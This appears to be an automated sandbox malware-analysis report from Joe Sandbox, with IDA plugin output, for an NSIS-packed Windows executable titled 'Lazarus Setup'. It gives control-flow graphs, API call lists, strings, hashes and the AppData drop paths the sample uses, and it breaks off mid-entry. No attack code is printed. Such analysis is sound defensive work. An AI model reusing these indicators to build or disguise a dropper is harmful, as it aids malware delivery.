                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\3Pd480eWHA.exe"$C:\Users\user~1\AppData\Local\Temp\$Frbids.tal$\*.*
                                                                                              • API String ID: 2035342205-3138714309
                                                                                              • Opcode ID: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                                              • Instruction ID: 15aabf9ae26d8a027305d4c4078bc37ad96aa8a5c182164a2950041f9cf2f42d
                                                                                              • Opcode Fuzzy Hash: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                                              • Instruction Fuzzy Hash: C651DF30800A04BADB21AB618C45BBF7A78DF42355F54857BF449B61D2D73C4981EE6E
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNELBASE(771B3410,0079FD90,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,004058AF,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055CE,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 0040601B
                                                                                              • FindClose.KERNEL32(00000000), ref: 00406027
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp, xrefs: 00406010
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp
                                                                                              • API String ID: 2295610775-2031227991
                                                                                              • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                                              • Instruction ID: 592bcfe3733b0aa744bdfcff45d7cd7e76fdd068ce72c1f71716353b7d55c377
                                                                                              • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                                              • Instruction Fuzzy Hash: 02D012319491305BC714977C7D4C84F7A6C9B193717114A32F46AF12E0C6749CA286E9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 179 403a1e-403a30 180 403b71-403b80 179->180 181 403a36-403a3c 179->181 183 403b82-403bca GetDlgItem * 2 call 403ef1 SetClassLongA call 40140b 180->183 184 403bcf-403be4 180->184 181->180 182 403a42-403a4b 181->182 187 403a60-403a63 182->187 188 403a4d-403a5a SetWindowPos 182->188 183->184 185 403c24-403c29 call 403f3d 184->185 186 403be6-403be9 184->186 201 403c2e-403c49 185->201 191 403beb-403bf6 call 401389 186->191 192 403c1c-403c1e 186->192 194 403a65-403a77 ShowWindow 187->194 195 403a7d-403a83 187->195 188->187 191->192 214 403bf8-403c17 SendMessageA 191->214 192->185 200 403ebe 192->200 194->195 197 403a85-403a9a DestroyWindow 195->197 198 403a9f-403aa2 195->198 204 403e9b-403ea1 197->204 205 403aa4-403ab0 SetWindowLongA 198->205 206 403ab5-403abb 198->206 202 403ec0-403ec7 200->202 208 403c52-403c58 201->208 209 403c4b-403c4d call 40140b 201->209 204->200 215 403ea3-403ea9 204->215 205->202 212 403ac1-403ad2 GetDlgItem 206->212 213 403b5e-403b6c call 403f58 206->213 210 403e7c-403e95 DestroyWindow EndDialog 208->210 211 403c5e-403c69 208->211 209->208 210->204 211->210 217 403c6f-403cbc call 405d2e call 403ef1 * 3 GetDlgItem 211->217 218 403af1-403af4 212->218 219 403ad4-403aeb SendMessageA IsWindowEnabled 212->219 213->202 214->202 215->200 221 403eab-403eb4 ShowWindow 215->221 249 403cc6-403d02 ShowWindow KiUserCallbackDispatcher call 403f13 EnableWindow 217->249 250 403cbe-403cc3 217->250 223 403af6-403af7 218->223 224 403af9-403afc 218->224 219->200 219->218 221->200 227 403b27-403b2c call 403eca 223->227 228 403b0a-403b0f 224->228 229 403afe-403b04 224->229 227->213 232 403b45-403b58 SendMessageA 228->232 234 403b11-403b17 228->234 229->232 233 403b06-403b08 229->233 232->213 233->227 237 403b19-403b1f call 40140b 234->237 238 403b2e-403b37 call 40140b 234->238 245 403b25 237->245 238->213 247 403b39-403b43 238->247 245->227 247->245 253 403d04-403d05 249->253 254 403d07 249->254 250->249 255 403d09-403d37 GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d39-403d4a SendMessageA 255->256 257 403d4c 255->257 258 403d52-403d8b call 403f26 call 405d0c lstrlenA call 405d2e SetWindowTextA call 401389 256->258 257->258 258->201 267 403d91-403d93 258->267 267->201 268 403d99-403d9d 267->268 269 403dbc-403dd0 DestroyWindow 268->269 270 403d9f-403da5 268->270 269->204 271 403dd6-403e03 CreateDialogParamA 269->271 270->200 272 403dab-403db1 270->272 271->204 274 403e09-403e60 call 403ef1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 271->274 272->201 273 403db7 272->273 273->200 274->200 279 403e62-403e75 ShowWindow call 403f3d 274->279 281 403e7a 279->281 281->204
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5A
                                                                                              • ShowWindow.USER32(?), ref: 00403A77
                                                                                              • DestroyWindow.USER32 ref: 00403A8B
                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AA7
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403AC8
                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ADC
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403AE3
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403B91
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403B9B
                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB5
                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C06
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403CAC
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403CCD
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CDF
                                                                                              • EnableWindow.USER32(?,?), ref: 00403CFA
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D10
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403D17
                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D2F
                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D42
                                                                                              • lstrlenA.KERNEL32(0079E540,?,0079E540,Lazarus Setup), ref: 00403D6B
                                                                                              • SetWindowTextA.USER32(?,0079E540), ref: 00403D7A
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403EAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: @y$Lazarus Setup
                                                                                              • API String ID: 3282139019-422933514
                                                                                              • Opcode ID: f91631ea6a7899119ed47f58db1b72be55114eb3759132e365ec33f9056147a3
                                                                                              • Instruction ID: 604a4885fc931abc1044a41a4cf0f2958d917e977c7d56f4e50accb35e18e33b
                                                                                              • Opcode Fuzzy Hash: f91631ea6a7899119ed47f58db1b72be55114eb3759132e365ec33f9056147a3
                                                                                              • Instruction Fuzzy Hash: F1C1AE31904205ABEB216F61ED85E2B3EACEB4574AF00453EF501B11F1C739A942DB5E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 282 40368c-4036a4 call 4060a5 285 4036a6-4036b6 call 405c6a 282->285 286 4036b8-4036e9 call 405bf3 282->286 295 40370c-403735 call 403951 call 40586c 285->295 291 403701-403707 lstrcatA 286->291 292 4036eb-4036fc call 405bf3 286->292 291->295 292->291 300 40373b-403740 295->300 301 4037bc-4037c4 call 40586c 295->301 300->301 302 403742-403766 call 405bf3 300->302 307 4037d2-4037f7 LoadImageA 301->307 308 4037c6-4037cd call 405d2e 301->308 302->301 309 403768-40376a 302->309 311 403878-403880 call 40140b 307->311 312 4037f9-403829 RegisterClassA 307->312 308->307 313 40377b-403787 lstrlenA 309->313 314 40376c-403779 call 4057a9 309->314 326 403882-403885 311->326 327 40388a-403895 call 403951 311->327 315 403947 312->315 316 40382f-403873 SystemParametersInfoA CreateWindowExA 312->316 320 403789-403797 lstrcmpiA 313->320 321 4037af-4037b7 call 40577e call 405d0c 313->321 314->313 319 403949-403950 315->319 316->311 320->321 325 403799-4037a3 GetFileAttributesA 320->325 321->301 330 4037a5-4037a7 325->330 331 4037a9-4037aa call 4057c5 325->331 326->319 335 40389b-4038b5 ShowWindow call 406037 327->335 336 40391e-40391f call 404ff7 327->336 330->321 330->331 331->321 343 4038c1-4038d3 GetClassInfoA 335->343 344 4038b7-4038bc call 406037 335->344 339 403924-403926 336->339 341 403940-403942 call 40140b 339->341 342 403928-40392e 339->342 341->315 342->326 345 403934-40393b call 40140b 342->345 348 4038d5-4038e5 GetClassInfoA RegisterClassA 343->348 349 4038eb-40390e DialogBoxParamA call 40140b 343->349 344->343 345->326 348->349 353 403913-40391c call 4035dc 349->353 353->319
                                                                                              APIs
                                                                                                • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                                                • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                                              • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\3Pd480eWHA.exe",00000000), ref: 00403707
                                                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,771B3410), ref: 0040377C
                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 0040378F
                                                                                              • GetFileAttributesA.KERNEL32(Call), ref: 0040379A
                                                                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne), ref: 004037E3
                                                                                                • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                                              • RegisterClassA.USER32(007A16E0), ref: 00403820
                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403838
                                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040386D
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 004038A3
                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 004038CF
                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 004038DC
                                                                                              • RegisterClassA.USER32(007A16E0), ref: 004038E5
                                                                                              • DialogBoxParamA.USER32(?,00000000,00403A1E,00000000), ref: 00403904
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\Desktop\3Pd480eWHA.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                              • API String ID: 1975747703-1217668670
                                                                                              • Opcode ID: 1f1d7b7cedc4fdc1a161c84c86f92609142e4f2c1f25f6f9bda009316c644032
                                                                                              • Instruction ID: b6748c6733e3bb55aa357910a2c4fdec813f4d760fd6ac6bc3454eeade69f907
                                                                                              • Opcode Fuzzy Hash: 1f1d7b7cedc4fdc1a161c84c86f92609142e4f2c1f25f6f9bda009316c644032
                                                                                              • Instruction Fuzzy Hash: D06106B4504244AEE710AF659C45F3B3AACEB85789F00857FF900B22E1D77CAD019B2D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 40597f 359 402cc0-402cee call 405d0c call 4057c5 call 405d0c GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 371 402cf9-402d10 368->371 375 402deb-402dee 369->375 376 402e3e-402e43 369->376 373 402d12 371->373 374 402d14-402d1d call 40308e 371->374 373->374 383 402d23-402d2a 374->383 384 402e45-402e4d call 402c02 374->384 378 402df0-402e08 call 4030a4 call 40308e 375->378 379 402e12-402e3c GlobalAlloc call 4030a4 call 402e9f 375->379 376->361 378->376 406 402e0a-402e10 378->406 379->376 405 402e4f-402e60 379->405 388 402da6-402daa 383->388 389 402d2c-402d40 call 40593a 383->389 384->376 394 402db4-402dba 388->394 395 402dac-402db3 call 402c02 388->395 389->394 403 402d42-402d49 389->403 396 402dc9-402dd3 394->396 397 402dbc-402dc6 call 40611a 394->397 395->394 396->371 404 402dd9 396->404 397->396 403->394 409 402d4b-402d52 403->409 404->369 410 402e62 405->410 411 402e68-402e6d 405->411 406->376 406->379 409->394 412 402d54-402d5b 409->412 410->411 413 402e6e-402e74 411->413 412->394 414 402d5d-402d64 412->414 413->413 415 402e76-402e91 SetFilePointer call 40593a 413->415 414->394 416 402d66-402d86 414->416 419 402e96 415->419 416->376 418 402d8c-402d90 416->418 420 402d92-402d96 418->420 421 402d98-402da0 418->421 419->361 420->404 420->421 421->394 422 402da2-402da4 421->422 422->394
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402C77
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3Pd480eWHA.exe,00000400), ref: 00402C93
                                                                                                • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\3Pd480eWHA.exe,80000000,00000003), ref: 00405983
                                                                                                • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Pd480eWHA.exe,C:\Users\user\Desktop\3Pd480eWHA.exe,80000000,00000003), ref: 00402CDF
                                                                                              Strings
                                                                                              • Null, xrefs: 00402D5D
                                                                                              • Inst, xrefs: 00402D4B
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                              • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                              • "C:\Users\user\Desktop\3Pd480eWHA.exe", xrefs: 00402C66
                                                                                              • Error launching installer, xrefs: 00402CB6
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                              • soft, xrefs: 00402D54
                                                                                              • C:\Users\user\Desktop\3Pd480eWHA.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\3Pd480eWHA.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3Pd480eWHA.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                              • API String ID: 4283519449-3783679330
                                                                                              • Opcode ID: 48d0b30a573a01b2c2b1968d3d6d53f6fa88bda45e86464b42b605cd2148996d
                                                                                              • Instruction ID: fe9ef23653e85685a193ad9c5457c4b2e55d644b791d7b95544962d8ab1ad500
                                                                                              • Opcode Fuzzy Hash: 48d0b30a573a01b2c2b1968d3d6d53f6fa88bda45e86464b42b605cd2148996d
                                                                                              • Instruction Fuzzy Hash: CC51F471941214AFEB119F65DE89B9E7BA8EF04364F14803BF904B62D1D7BC8D408BAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 754 401751-401774 call 402a3a call 4057eb 759 401776-40177c call 405d0c 754->759 760 40177e-401790 call 405d0c call 40577e lstrcatA 754->760 766 401795-40179b call 405f77 759->766 760->766 770 4017a0-4017a4 766->770 771 4017a6-4017b0 call 406010 770->771 772 4017d7-4017da 770->772 780 4017c2-4017d4 771->780 781 4017b2-4017c0 CompareFileTime 771->781 774 4017e2-4017fe call 40597f 772->774 775 4017dc-4017dd call 40595a 772->775 782 401800-401803 774->782 783 401876-40189f call 404f25 call 402e9f 774->783 775->774 780->772 781->780 784 401805-401847 call 405d0c * 2 call 405d2e call 405d0c call 405502 782->784 785 401858-401862 call 404f25 782->785 797 4018a1-4018a5 783->797 798 4018a7-4018b3 SetFileTime 783->798 784->770 818 40184d-40184e 784->818 795 40186b-401871 785->795 799 4028d8 795->799 797->798 801 4018b9-4018c4 CloseHandle 797->801 798->801 802 4028da-4028de 799->802 804 4018ca-4018cd 801->804 805 4028cf-4028d2 801->805 806 4018e2-4018e5 call 405d2e 804->806 807 4018cf-4018e0 call 405d2e lstrcatA 804->807 805->799 813 4018ea-402273 call 405502 806->813 807->813 813->802 818->795 819 401850-401851 818->819 819->785
                                                                                              APIs
                                                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit,00000000,00000000,00000031), ref: 00401790
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit,00000000,00000000,00000031), ref: 004017BA
                                                                                                • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Lazarus Setup,NSIS Error), ref: 00405D19
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                                                • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0), ref: 00404F81
                                                                                                • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll), ref: 00404F93
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp$C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit$Call
                                                                                              • API String ID: 1941528284-3388948453
                                                                                              • Opcode ID: 5963c7d106c76f5ca0071d1a776a8225d19f187018aad275a070e7a80bf2da84
                                                                                              • Instruction ID: e334bcbcf7859558867c6a38b10ffbeddee8f855bc543c6a7f27992f07fd6e89
                                                                                              • Opcode Fuzzy Hash: 5963c7d106c76f5ca0071d1a776a8225d19f187018aad275a070e7a80bf2da84
                                                                                              • Instruction Fuzzy Hash: 4B41C672900519BADB107BA5CC45DAF7AB9DF46329B20C33BF021B20E1C67C4A419A5D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 821 404f25-404f3a 822 404ff0-404ff4 821->822 823 404f40-404f52 821->823 824 404f54-404f58 call 405d2e 823->824 825 404f5d-404f69 lstrlenA 823->825 824->825 827 404f86-404f8a 825->827 828 404f6b-404f7b lstrlenA 825->828 829 404f99-404f9d 827->829 830 404f8c-404f93 SetWindowTextA 827->830 828->822 831 404f7d-404f81 lstrcatA 828->831 832 404fe3-404fe5 829->832 833 404f9f-404fe1 SendMessageA * 3 829->833 830->829 831->827 832->822 834 404fe7-404fea 832->834 833->832 834->822
                                                                                              APIs
